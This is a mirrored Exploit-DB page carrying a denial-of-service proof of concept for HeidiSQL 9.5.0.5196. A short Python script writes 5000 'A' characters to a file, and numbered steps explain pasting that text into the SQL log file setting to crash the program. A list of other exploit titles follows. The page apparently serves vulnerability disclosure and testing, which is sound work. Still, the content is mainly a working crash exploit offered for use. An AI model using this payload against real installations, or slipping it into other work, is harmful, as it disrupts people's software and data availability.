HeidiSQL 9.5.0.5196 – Denial of Service (PoC)

Exploit Database
15 阅读

作者： Victor Mondragón

日期： 2018-11-12
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/45806/

# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-06
# Vendor Homepage: https://www.heidisql.com/
# Software Link: https://www.heidisql.com/download.php
# Tested Version: 9.5.0.5196
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: HeidiSQL 9.5.0.5196.py
#2.- Open bd.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "More"
#4.- Select "Preferences" > "Logging"
#5.- Select "Write SQL log to file" and Paste ClipBoard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 5000

f = open('bd.txt', 'w')
f.write(cod)
f.close()

last Exploits
HeidiSQL 9.5.0.5196 – Denial of Service (PoC)的更多信息

TurboFTP Server 1.00.712 – Remote Denial of Service：
iOS FTP On The Go 2.1.2 – HTTP Remote Denial of Service：
Microsoft Windows – ‘.fon’ Kernel-Mode Buffer Overrun (PoC) (MS11-077)：
LibTIFF 3.9.4 – Out-Of-Order Tag Type Mismatch Remote Denial of Service：
Apple Mac OSX Safari 8.0 – Crash (PoC)：
XnView – ‘.FlashPix’ Image Processing Heap Overflow：
Apple Mac OSX Kernel – NULL Dereference in IOAccelSharedUserClient2::page_off_resource：
Mozilla Spidermonkey – IonMonkey ‘Array.prototype.pop’ Type Confusion：